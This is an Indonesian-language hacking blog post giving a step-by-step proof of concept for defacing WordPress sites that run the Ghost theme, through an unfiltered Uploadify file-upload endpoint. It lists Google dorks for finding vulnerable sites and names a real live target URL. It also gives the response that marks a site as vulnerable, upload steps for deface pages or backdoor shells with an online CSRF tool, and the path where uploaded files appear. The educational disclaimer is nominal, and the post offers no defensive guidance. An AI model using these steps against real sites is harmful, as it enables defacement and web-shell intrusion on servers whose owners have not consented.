Deface POC WP Ghost Theme [LiveTarget] via Uploadify

6ickzone 0
Deface POC WP Ghost Theme [LiveTarget] via Uploadify

Deface POC WP Ghost Theme [LiveTarget] via Uploadify

⚠️ Disclaimer: This article is intended solely for educational purposes. The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this content.

Apa Itu WP Ghost Theme Vulnerability?

Ghost Theme di WordPress memiliki kelemahan di file upload_settings_image.php yang menggunakan library Uploadify. Bug ini memungkinkan file upload tanpa filter, sehingga attacker bisa mengunggah script deface atau bahkan shell backdoor.

Alat yang Dibutuhkan

  • 💻 Komputer atau HP
  • 🌐 Koneksi internet
  • 📝 Script deface (.txt , .jpg .png .gif .htm.html)
  • 🐚 Shell backdoor (opsional)

Dork Google untuk Cari Target


inurl:wp-content/themes/Ghost/

inurl:wp-content/themes/Ghost/includes/

inurl:wp-content/themes/Ghost/includes/uploadify/

inurl:wp-content/themes/Ghost/includes/uploadify/upl
oad_settings_image.php

exploit(endpoint)

wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Cari target menggunakan Google dork di atas. Fokus ke hasil dengan path upload_settings_image.php.

Ciri-ciri Target Vulnerable

Saat target rentan diakses, biasanya akan muncul respon JSON seperti ini:


{"status":"NOK", "ERR":"This file is incorect"}

👉 Kalau muncul pesan di atas, artinya endpoint aktif dan bisa dicoba exploit. Kalau 404 / error beda, kemungkinan sudah dipatch.

Live Target Contoh

Contoh target yang menggunakan Ghost Theme:
https://www.esthetiquejulie.be/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Langkah Eksploitasi Uploadify (PoC)

Step by Step

  1. Buka tool CSRF online: https://tools.prinsh.com/home/?tools=csrf
  2. Isi kolom URL dengan link exploit (contoh: /upload_settings_image.php)
  3. Pada Post File, masukkan: filedata
  4. Upload file deface / shell favoritmu (misal: sclu.html)
  5. Klik Lock dan jalankan request

Kenapa bisa berhasil? Karena script upload ini tidak memfilter ekstensi file dan tidak mengecek MIME-type.

Cara Akses File yang Sudah Diupload

Lokasi file hasil upload biasanya di folder:


/wp-content/uploads/settingsimages/

Contoh akses SC:

https://target.com/wp-content/uploads/settingsimages/sclu.html
"Where creativity, exploitation, and expression collide." — 6ickZone
Tags

6ickzone

I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.

Post a Comment

Posting Komentar

Lebih baru Lebih lama